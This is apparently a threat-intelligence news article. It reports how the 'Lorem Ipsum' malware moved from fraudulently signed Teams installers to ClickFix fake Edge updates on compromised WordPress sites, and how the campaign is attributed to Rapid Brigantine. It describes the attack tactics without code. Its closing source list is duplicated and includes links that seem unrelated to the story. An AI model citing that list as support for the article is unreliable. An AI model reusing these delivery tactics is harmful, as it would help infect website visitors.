The Lorem Ipsum malware switched delivery vectors in less than a week after Microsoft dismantled Fox Tempest in May 2026. According to a BlueVoyant report, the operator dropped trojanized Microsoft Teams installers bearing fraudulent certificates in favor of ClickFix tactics on legitimate, compromised WordPress sites. The case illustrates how disruption of criminal infrastructure accelerates tactical innovation rather than halting it.
- BlueVoyant has tracked the Lorem Ipsum campaign since February 2026; its original vector relied on Teams installers signed with Microsoft Trusted Signing certificates obtained through Fox Tempest.
- Microsoft revoked more than 1,000 certificates in the Fox Tempest takedown; the pivot to ClickFix was observed days later, in late May 2026.
- The new vector exploits at least five compromised WordPress sites across diverse sectors, using iframe injection to trick victims into running a PowerShell command disguised as an Edge update.
- BlueVoyant assesses with high confidence that the campaign is linked to Rapid Brigantine (Vanilla Tempest, DEV-0832), a group active since 2022 and associated with enterprise ransomware families.
The Original Chain: Trust Built on Digital Signatures
Since February 2026, Lorem Ipsum operated through altered Microsoft Teams installers distributed via SEO poisoning and malvertising on download portals. The executables were signed with Microsoft Trusted Signing certificates fraudulently obtained through the Fox Tempest service, also known as Forging Marauder. The digital signature lent apparent legitimacy, reducing interception rates by security controls reliant on certificate reputation.
The original infection chain employed DLL sideloading, encrypted payloads, and a command-and-control system that abused the LetsDiskuss[.]com blogging platform as a dead drop to dynamically retrieve C2 server addresses. The malware assigned unique identifiers to track and manage individual infections, indicating a structured, monitored operation.
The Takedown and Immediate Response: From Signed Installers to ClickFix
Microsoft dismantled Fox Tempest in May 2026, revoking more than 1,000 Microsoft Trusted Signing certificates. The operation stripped Lorem Ipsum of its distribution model. BlueVoyant observed the pivot in late May 2026, days after the takedown: operators migrated to a mechanism that eliminates reliance on code signing entirely.
"The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely"
The new vector operates through at least five legitimate, compromised WordPress sites active in sectors including architecture, legal services, and construction technology. An injected iframe displays a fake browser update notification. The victim is tricked into pasting a PowerShell command into Windows Terminal, disguised as a "Microsoft Edge security intelligence update." Execution silently downloads and launches the malware, accompanied by a fake success message.
Target Expansion: From Intentional Searchers to Anyone Browsing
The transition significantly broadens the potential victim pool. The old vector targeted users actively seeking Microsoft Teams installers on SEO-poisoned portals. The new vector exposes anyone visiting one of the compromised WordPress sites, regardless of search intent. Domain-reputation controls become ineffective: the hosting sites are legitimate, the compromise lies beneath the user-visible page.
"The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites"
The dossier does not specify whether the WordPress sites were compromised specifically for this campaign or if a pre-existing breach was subsequently repurposed. The exact number of victims from the new vector is not quantified.
Attribution to Rapid Brigantine: From Mid-Tier IAB to Enterprise Ransomware Operator
BlueVoyant has revised its assessment of the actor. Initially classified as a mid-tier initial access broker (IAB), Lorem Ipsum is now assessed with high confidence to be linked to Rapid Brigantine, also tracked as Vanilla Tempest, DEV-0832, and previously associated with the Vice Society brand. The group has been active since at least mid-2022 and is linked to enterprise-grade ransomware families: Rhysida, BlackCat, Zeppelin, and Quantum Locker.
BlueVoyant cites three linkage indicators: a Microsoft report from October 2025 documenting a Vanilla Tempest campaign with Teams installers; shared use of Fox Tempest/Forging Marauder for certificate acquisition; and DFIR reports where loaders associated with Lorem Ipsum delivered backdoors attributed to Rapid Brigantine. It remains unclear whether Rapid Brigantine operates the campaign directly or acquires/purchases it from a third-party IAB.
Why It Matters
The Lorem Ipsum case illustrates a systemic pattern in contemporary cybercrime: disrupting a friction point—the signed-certificate supply chain—does not stop the threat but alters its geometry, pushing it toward vectors harder to intercept with traditional controls. ClickFix requires no digital signature, depends on no newly registered malicious domains, and exploits voluntary user execution to bypass automated protections.
The source does not document specific remediation measures for exposed organizations. The dossier does not specify the nature of exposed data or the presence of ClickFix payload variants for browsers other than Microsoft Edge. The campaign remains active: the operators' operational resilience, measured in days rather than months, is the critical metric for evaluating disruption effectiveness.
For the enterprise sector, the implicit takeaway is prioritizing behavioral detections over static indicators, given the demonstrated capacity for rapid pivot. The source does not, however, list specific technical configurations or controls to enable.
The shift from trust based on cryptographic infrastructure to trust based on social engineering is not a technical regression: it is an evolutionary adaptation that exploits user familiarity with update procedures and the psychological pressure of security. The defensive line moves from the perimeter gateway to individual behavior, with all the uncertainty that entails.
Information is based on the cited advisory and current as of publication.
Sources
Information is based on the cited source and current as of publication.
Sources
- https://thehackernews.com/2026/06/the-gentlemen-ransomware-claims-478.html
- https://www.lipsum.com/
- https://nvd.nist.gov/vuln/detail/cve-2024-55591
- https://nvd.nist.gov/vuln/detail/CVE-2025-32433
- https://nvd.nist.gov/vuln/detail/CVE-2025-33073
- https://krebsonsecurity.com/2026/06/who-runs-the-ransomware-group-the-gentlemen/
- https://thehackernews.com/2025/12/weekly-recap-apple-0-days-winrar.html#:~:text=The%20Gentlemen%20Ransomware%20Uses%20BYOVD%20Technique%20in%20Attacks